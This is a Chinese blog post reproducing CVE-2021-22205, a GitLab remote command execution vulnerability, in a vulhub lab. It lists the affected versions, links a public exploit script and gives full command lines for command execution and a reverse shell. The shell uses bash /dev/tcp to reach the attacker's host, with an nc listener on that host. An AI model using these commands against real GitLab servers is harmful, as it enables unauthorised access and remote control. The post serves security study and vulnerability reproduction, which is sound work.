GitLab 远程命令执行漏洞复现(CVE-2021-22205)

最新推荐文章于 2024-08-12 09:52:23 发布

Passer798

最新推荐文章于 2024-08-12 09:52:23 发布

阅读量4.4k

点赞数

分类专栏：漏洞复现文章标签： gitlab CVE 安全漏洞

本文链接：https://blog.csdn.net/guo15890025019/article/details/121658613

版权

漏洞复现专栏收录该内容

20 篇文章 12 订阅

订阅专栏

一、漏洞描述

GitLab 没有正确验证传递给文件解析器的图像文件，这导致远程命令执行，可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解，漏洞编号CVE-2021-22205。

二、影响版本

11.9 <=  GitLab（CE/EE）< 13.8.8
13.9 <=  GitLab（CE/EE）< 13.9.6
13.10 <= GitLab（CE/EE）< 13.10.3

三、环境搭建

快速搭建，可以使用vulhub

git clone https://github.com/vulhub/vulhub.git
cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d

环境启动后，访问http://127.0.0.1:8080即可查看到GitLab的登录页面

四、漏洞复现

4.1、脚本复现

4.1.1、下载利用脚本

https://github.com/Al1ex/CVE-2021-22205

4.1.2、检测漏洞是否存在

py CVE-2021-22205.py -v true -t http://192.168.30.56/

在这里插入图片描述

4.1.3、命令执行

首先起一个http服务

py -m http.server 1234

在这里插入图片描述
然后命令执行

py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "curl http://192.168.8.14:1234/1.txt"

通过http服务端查看，命令执行成功
在这里插入图片描述

4.1.4、反弹shell

#写入反弹shell脚本
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "echo 'bash -i >& /dev/tcp/192.168.8.14/6666 0>&1' > /tmp/1.sh"
#赋予shell脚本执行权限
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "chmod +x  /tmp/1.sh"
#服务器监听6666端口
nc64.exe -lvnp  6666
#获取git权限
py CVE-2021-22205.py -a true -t http://192.168.30.56/ -c "/bin/bash /tmp/1.sh"